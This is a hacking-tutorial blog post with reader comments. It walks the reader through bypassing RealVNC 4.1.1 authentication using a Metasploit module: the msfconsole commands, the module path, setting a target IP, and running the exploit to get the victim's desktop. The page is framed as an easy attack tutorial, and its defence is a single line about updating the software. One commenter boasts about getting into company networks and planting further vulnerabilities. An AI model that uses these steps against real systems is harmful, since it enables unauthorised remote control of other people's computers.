• 26,769
  • +1,026
  • 3,010
5 Simple Steps Bypass Real VNC Authentication

5 Simple Steps Bypass Real VNC Authentication

Bookmark

Type : Tutorial

Level : Easy

Victim O.S : Windows XP SP3

Victim Vulnerable Application : RealVNC 4.1.1

Attacker O.S : Backtrack 5 R1

When looking around the web, and look at 1337day.com website I see a new remote exploit there about Real VNC Authentication Bypass. Actually securityfocus.com already describe this vulnerability here.

What is VNC? According to RealVNC website on realvnc.com :

RealVNC provides remote administration control software which lets you see and interact with desktop applications across any network.

RealVNC was life safer for system administrator who didn't too familiar with telnet or SSH, because they can see the desktop in real time, or in short words it looks like you use Remode Desktop Connection that is how RealVNC works.

Requirement :

1. Metasploit framework

Step By Step 5 Simple Steps Bypass Real VNC Authentication:

1. Open your terminal and type msfconsole command to go to your metasploit console.

2. The next step you need to define the exploit you want to use, it was realvnc_41_bypass.

msf > use exploit/multi/vnc/realvnc_41_bypass

3. The main thing you should remember that in this type of attack we didn't need to set up the payload, because we're attacking and bypassing VNC login, so the payload it also should be bring the victim desktop into our computer ๐Ÿ™‚

Let's view the available switch by running show options command :

Real VNC Authentication Bypass Step by Step Tutorial

Information :

autovnc --> automatically launch the VNC viewer

lport --> our local VNC viewer port(port5900 was the default port)

rhost --> target machine(victim computer)

rport --> target port on victim machine(port 5900 was the default port)

4. Set our target by using RHOST switch

msf  auxiliary(realvnc_41_bypass) > set rhost 192.168.8.94
rhost => 192.168.8.94

5. Okay, everything was already set up so great until this step and for the final step was using the exploit command.

Real VNC Authentication Bypass Step by Step Tutorial

Together with that script generated, we also have the victim screen via our local VNC viewer

Real VNC Authentication Bypass Step by Step Tutorial

Yes we're in! ๐Ÿ™‚

Countermeasures :

1. Update your VNC into the newer version, as you can see on securityfocus.com links above the newest version was not vulnerable.

Hope you enjoyed it ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • puppet

    is this exploit vulnerable to wiriless network n lan network only???

    • v4L

      #puppet
      any network if they are using this vulnerable vnc version can be exploited.

  • darkcrimson

    RealVNC patched this a long time ago. Metasploit also changed the directory to "auxillary/admin/vnc/realvnc_41_bypass" You never know, though. It's happened to me where I've run into a company using old versions of RealVNC and I've gained access. It's getting tougher and tougher nowadays.

    • v4L

      #darkcrimson
      LoL..you’re so true…but so sorry because I wrote this tutorial on July – August 2011 (almost 1 year ago) ๐Ÿ™‚ you can see through the comment isn’t it? But thanks anyway to remind me to update this post ๐Ÿ™‚

  • darkcrimson

    Ah! I wasn't trying to correct you. I was only pointing it out to anyone who stopped by. Hey, for what it's worth, the old exploit worked flawlessly for a long time. The benefit to it isn't only gaining access, but the "house rules" are once you're in, you can create even more vulnerabilities; which can really make the job fun. It was always nice to send the final report to the Systems Administrators telling them "Your network has failed my expectations. This network currently has 301 vulnerabilities over the entire subnet." -to which I would be employed to stick around and fix. Let's face it, that exploit would net me about 5k in a week. I miss those days.

  • Nice blog heге! Also yоur ωeb site loads up fast!
    What web hoѕt are yοu uѕing?
    Can I gеt your affilіate link to your host?
    I wiѕh my website lοaded up as quickly as yours lol